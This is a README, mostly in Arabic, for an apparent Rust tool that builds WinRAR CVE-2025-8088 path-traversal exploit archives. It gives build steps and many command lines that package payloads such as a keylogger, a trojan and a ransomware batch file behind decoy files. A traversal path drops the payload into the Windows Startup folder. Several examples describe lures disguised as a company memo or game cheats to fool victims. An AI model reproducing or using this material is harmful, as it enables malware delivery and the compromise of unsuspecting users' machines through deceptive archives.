
تنفيذ عالي الأداء وآمن من حيث الذاكرة لأداة استغلال WinRAR CVE-2025-8088، أعيدت كتابتها بلغة Rust لتحسين الموثوقية والأداء.
أداة متقدمة لاستغلال اجتياز المسار في WinRAR - مكتوبة بلغة Rust
تنفيذ عالي الأداء وآمن على مستوى الذاكرة لأداة استغلال WinRAR CVE-2025-8088، أُعيدت كتابتها بلغة Rust لتحسين الموثوقية والأداء.
# Install Rust using rustup
# Verify installation
rustc --version
cargo --version
# Using vcpkg
vcpkg install gtk:x64-windows
pacman -S mingw-w64-x86_64-gtk4
# Navigate to the rust project
cd winrar_exploit_rust
# Build in debug mode
cargo build
# Build optimized release
cargo build --release
# Run the application
cargo run --release
أنشئ استغلالًا بسيطًا مع ملف حمولة وملف إغراء:
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"
# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"
استخدم عدة ملفات إغراء مفصولة بفواصل:
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"
حدد مجلدًا مخصصًا حيث سيتم وضع الحمولة:
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"
حمولة صورة (إخفاء بيانات):
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"
حمولة PDF:
# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"
حمولة سكربت دفعي:
# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose
# Show available tools and features
.\winrar_exploit_rust.exe tools
أنشئ مستندًا خبيثًا يبدو كمذكرة شركة:
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"
أخفِ البرمجيات الخبيثة في ملف غش للعبة:
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"
تنشئ الأداة أرشيفات RAR مع اجتياز المسار باستخدام:
مثال المسار: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
winrar_exploit_rust/
├── src/
│ ├── main.rs # Application entry point
│ ├── gui.rs # GTK-based user interface
│ ├── exploit.rs # Core exploit logic
│ ├── ads.rs # NTFS ADS manipulation
│ ├── rar.rs # RAR5 header manipulation
│ ├── diagnostics.rs # System diagnostics
│ └── error.rs # Error handling
├── Cargo.toml # Dependencies and build config
└── README.md # This file
تتضمن الأداة تشخيصًا تلقائيًا يتحقق من:
"تعذر العثور على GTK"
# Install GTK development libraries
# Windows (vcpkg)
vcpkg install gtk:x64-windows
# Or using MSYS2
pacman -S mingw-w64-x86_64-gtk4
"تعذر العثور على واجهة أوامر WinRAR"
rar.exe في Program Files"تعذر الكتابة إلى مجلد بدء التشغيل"
"NTFS ADS غير مدعوم"
أخطاء الترجمة
# Update Rust toolchain
rustup update
# Clean and rebuild
cargo clean
cargo build --release
# Format code
cargo fmt
# Lint code
cargo clippy
تشمل التبعيات الرئيسية:
gtk - إطار عمل رسومي حديثtokio - وقت تشغيل غير متزامنwindows - روابط Windows APIcrc32fast - حساب سريع لـ CRC32byteorder - التعامل مع ترتيب البايتاتanyhow - معالجة الأخطاءهذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
صُنع بواسطة @kanonufo على تيليغرام
أداة فريق أحمر عالية الأداء لاستغلال CVE-2025-8088 - إصدار Rust